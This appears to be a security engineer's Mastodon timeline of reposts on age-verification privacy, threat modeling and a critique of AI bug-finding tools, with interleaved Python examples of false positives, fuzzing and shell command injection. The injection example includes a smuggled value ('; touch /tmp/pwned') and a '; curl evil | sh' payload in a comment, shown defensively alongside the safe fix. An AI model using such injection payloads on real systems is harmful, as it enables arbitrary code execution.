Lisi Hocke

@lisihocke
1.4K Followers
928 Following
10.1K Posts

security engineer, holistic tester, quality enabler, agile experimenter, sociotechnical symmathecist, team glue. volleyball player, game lover, story escapist. she/her.

#tech #security #CyberSecurity #SecurityEngineering #ProdSec #AppSec #DevSecOps #testing #quality #development #software #collaboration #pairing #EnsembleProgramming #EnsembleTesting #SoftwareTeaming #agile #experimenting #sociotechnical

Pronouns: she/her
Website: https://www.lisihocke.com
Linktree: https://linktr.ee/lisihocke
Completely boring take on IT security in the age of AI-discovered security vulnerabilities: Everything in IT security that was a good idea before is still a good idea. When security updates are available, install them. Reduce attack surface, avoid unnecessary complexity. Don't reuse passwords.

Kymberlee Price uses her experience with secure design engineering practices to suggest ways to measure the ROI of threat modeling that track impact, not just activity, in our latest blog post.

https://shostack.org/blog/roi-of-threat-modeling/

Shostack + Friends Blog > Measuring the ROI of threat modeling: moving from activity to impact

Shostack + Associates COO Kymberlee Price shares her experience measuring the impact of secure design engineering practices on security outcomes

Hackers Expose The Massive Surveillance Stack Hiding Inside Your “Age Verification” Check

"We've been saying this for years now, and we're going to keep saying it until the message finally sinks in: mandatory age verification creates massive, centralized honeypots of sensitive biometric data that will inevitably be breached."

Link: https://www.techdirt.com/2026/02/25/hackers-expose-the-massive-surveillance-stack-hiding-inside-your-age-verification-check/

#linkdump #blogpost #surveillance

Picard management tip: Study history. The answers are there.

If this is your first visit to SWEC or to an Open Space, we've summarized the four guiding principles for you.

To get the most out of your visit, follow the "Law of Movement" and be yourself by contributing in whatever way feels comfortable to you.

#swec #swec26

Possibly controversial take....

Software systems need clear, cohesive, continuous ownership/accountability. This applies to:
* running applications that require operational support
* software libraries and frameworks that are "merely" used by other applications
* company internal apps, OSS libraries, and everything in between

If there isn't a specific team, led by a specific person, owning the system, then there is an accountability problem. Things will go wrong. Fingers will point.

Massive love out to @kentbeck . You are an inspiration and so much of what I believe about #programming comes from your work.

https://tidyfirst.substack.com/p/parkinsons

#extremeprogramming #XP

Parkinson's

Not trying to be subtle here

Software Design: Tidy First?

Embarrassing times for the European Commission after security researchers found flaws within minutes of using its age verification app. https://www.politico.eu/article/eu-brussels-launched-age-checking-app-hackers-say-took-them-2-minutes-break-it/

(ICYMI: I have a blog post on why age verification laws are a bad idea to begin with: https://this.weekinsecurity.com/papers-please-age-verification-laws-threaten-everyones-online-security-and-privacy/)

Brussels launched an age checking app. Hackers say it takes 2 minutes to break it.

Cyber experts say they have found holes in Brussels’ age verification app, despite claims by the EU executive that it is “technically ready.”

POLITICO

A few notes about the massive hype surrounding Claude Mythos:

The old hype strategy of 'we made a thing and it's too dangerous to release' has been done since GPT-2. Anyone who still falls for it should not be trusted to have sensible opinions on any subject.

Even their public (cherry picked to look impressive) numbers for the cost per vulnerability are high. The problem with static analysis of any kind is that the false positive rates are high. Dynamic analysis can be sound but not complete, static analysis can be complete but not sound. That's the tradeoff. Coverity is free for open source projects and finds large numbers of things that might be bugs, including a lot that really are. Very few projects have the resources to triage all of these. If the money spent on Mythos had been invested in triaging the reports from existing tools, it would have done a lot more good for the ecosystem.
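The soundness/completeness tradeoff mentioned above can be sketched with a minimal, hypothetical example (the function and the warning text are mine, not from any specific tool): a path-insensitive static analyzer warns about a path that can never actually execute, while dynamic analysis would never report it, but only covers the paths a test happens to run.

```python
# Hypothetical false positive of the kind path-insensitive static analysis
# produces: `present` and `value` always change together, so the warned-about
# path (value is None AND present is True) is unreachable.
def describe(value):
    present = value is not None
    if present:
        # A naive analyzer may warn: "value may be None here" - but this
        # branch is only entered when value is not None (false positive).
        return value.upper()
    return "<missing>"

# Dynamic analysis (just running it) observes no failure on either path:
print(describe("hi"))   # the guarded path
print(describe(None))   # the fallback path
```

Triaging such reports means ruling out, by hand, that any caller could ever reach the flagged state - which is exactly the cost the post argues most projects can't afford at scale.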

I recently received a 'comprehensive code audit' on one of my projects from an Anthropic user. Of the top ten bugs it reported, only one was important to fix (and should have been caught in code review, but was 15-year-old code from back when I was the only contributor and so there was no code review). Of the rest, a small number were technically bugs but were almost impossible to trigger (even deliberately). Half were false positives and two were not bugs and came with proposed 'fixes' that would have introduced performance regressions on performance-critical paths. But all of them looked plausible. And, unless you understood very well the environment in which the code runs and the things for which it's optimised, I can well imagine you'd just deploy those 'fixes' and wonder why performance was worse. Possibly Mythos is orders of magnitude better, but I doubt it.

This mirrors what we've seen with the public Mythos disclosures. One, for example, was complaining about a missing bounds check, yet every caller of the function did the bounds check and so introducing it just cost performance and didn't fix a bug. And, once again, remember that this is from the cherry-picked list that Anthropic chose to make their tool look good.
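The "missing bounds check" pattern described above can be illustrated with a toy sketch (the function names are mine, not from the actual disclosure): a hot-path helper deliberately omits its own check because every caller validates first, so an automated "fix" adding a second check is pure overhead, not a bug fix.

```python
def _get_unchecked(buf, i):
    # Hot-path helper: by contract, callers guarantee 0 <= i < len(buf).
    # Adding a bounds check here duplicates work already done at every
    # call site - the kind of "fix" that costs performance without
    # fixing a reachable bug.
    return buf[i]

def sum_window(buf, start, count):
    # The bounds check lives here, once, at the call site.
    if start < 0 or count < 0 or start + count > len(buf):
        raise ValueError("window out of range")
    return sum(_get_unchecked(buf, i) for i in range(start, start + count))
```

A tool that only sees `_get_unchecked` in isolation flags the missing check; only whole-program context reveals that the invariant is enforced by every caller.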

I don't doubt that LLMs can find some bugs other tools don't find, but that isn't new in the industry. Coverity, when it launched, found a lot of bugs nothing else found. When fuzzing became cheap and easy, it found a load of bugs. Valgrind and address sanitiser both caused spikes in bug discovery when they were released and deployed for the first time.

The one thing where Mythos is better than existing static analysers is that it can (if you burn enough money) generate test cases that trigger the bug. This is possible and cheaper with guided fuzzing but no one does it because burning 10% of the money that Mythos would cost is too expensive for most projects.
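The guided-fuzzing idea mentioned above - cheaply generating an input that actually triggers a bug - can be sketched in a few lines (a deliberately toy target and a crude coverage signal, nothing like a production fuzzer): keep a mutation only when it makes progress, the core loop behind tools like libFuzzer and AFL.

```python
import random

def target(data):
    # Hypothetical buggy function: crashes only on a specific 4-byte prefix.
    if data[:4] == b"BUG!":
        raise RuntimeError("crash reproduced")

def matched_prefix(data):
    # Crude stand-in for coverage feedback: how deep into the magic
    # prefix this input gets before diverging.
    n = 0
    for a, b in zip(data[:4], b"BUG!"):
        if a != b:
            break
        n += 1
    return n

def fuzz(seed=b"AAAA", rounds=200_000, rng_seed=0):
    # Greedy mutation loop: accept a mutant only if it increases the
    # coverage signal; return the first input that crashes the target.
    rng = random.Random(rng_seed)
    best, best_cov = bytearray(seed), matched_prefix(seed)
    for _ in range(rounds):
        cand = bytearray(best)
        cand[rng.randrange(len(cand))] = rng.randrange(256)
        try:
            target(bytes(cand))
        except RuntimeError:
            return bytes(cand)  # a ready-made regression test case
        cov = matched_prefix(bytes(cand))
        if cov > best_cov:
            best, best_cov = cand, cov
    return None
```

Real fuzzers use instrumented edge coverage instead of a hand-written distance function, but the economics are the same: the feedback loop is what makes input generation cheap.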

The source code for Claude Code was leaked a couple of weeks ago. It is staggeringly bad. I have never seen such low-quality code in production before. It contained things I'd have failed a first-year undergrad for writing. And, apparently, most of this is written with Claude Code itself.

But the most relevant part is that it contained three critical command-injection vulnerabilities.

These are the kind of things that static analysis should be catching. And, apparently at least one of the following is true:

  • Mythos didn't catch them.
  • Mythos doesn't work well enough for Anthropic to bother using it on their own code.
  • Mythos did catch them but the false-positive rate is so high that no one was able to find the important bugs in the flood of useless ones.

TL;DR: If you're willing to spend half as much money as Mythos costs to operate, you can probably do a lot better with existing tools.

Anthropic Claude Code Leak Reveals Critical Command Injection Vulnerabilities

Anthropic's Claude Code CLI contains three critical command injection vulnerabilities that allow attackers to execute arbitrary code and exfiltrate cloud credentials via environment variables, file paths, and authentication helpers. These flaws bypass the tool's internal sandbox and are particularly dangerous in CI/CD environments where trust dialogs are disabled.

BeyondMachines
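The injection pattern the summary describes - attacker-controlled values (here, hypothetically an environment variable) spliced into a shell command string - and its standard mitigation can be sketched like this (the function names and the `git clone` scenario are illustrative, not taken from the leaked code):

```python
import shlex

def build_cmd_unsafe(repo_url):
    # Vulnerable pattern: interpolating an untrusted value into a string
    # that will be handed to a shell. A payload like "; curl evil | sh"
    # rides along as a second command.
    return f"git clone {repo_url}"

def build_cmd_safe(repo_url):
    # Mitigation: pass an argv list (no shell involved), so the value
    # stays a single inert argument no matter what metacharacters it
    # contains. shlex.quote() is the fallback when a shell is unavoidable.
    return ["git", "clone", repo_url]

payload = "https://example.com/x.git; touch /tmp/pwned"

# In the string form, a shell would see a second command after the ';'.
tokens = shlex.split(build_cmd_unsafe(payload))
print(tokens)  # 'touch' appears as its own word

# In the argv form, the whole payload remains one argument.
print(build_cmd_safe(payload))
```

The same reasoning applies to file paths and helper binaries: the moment untrusted input reaches string-built shell commands (especially in CI/CD, where no one is watching a trust dialog), the injection is structural, not a corner case.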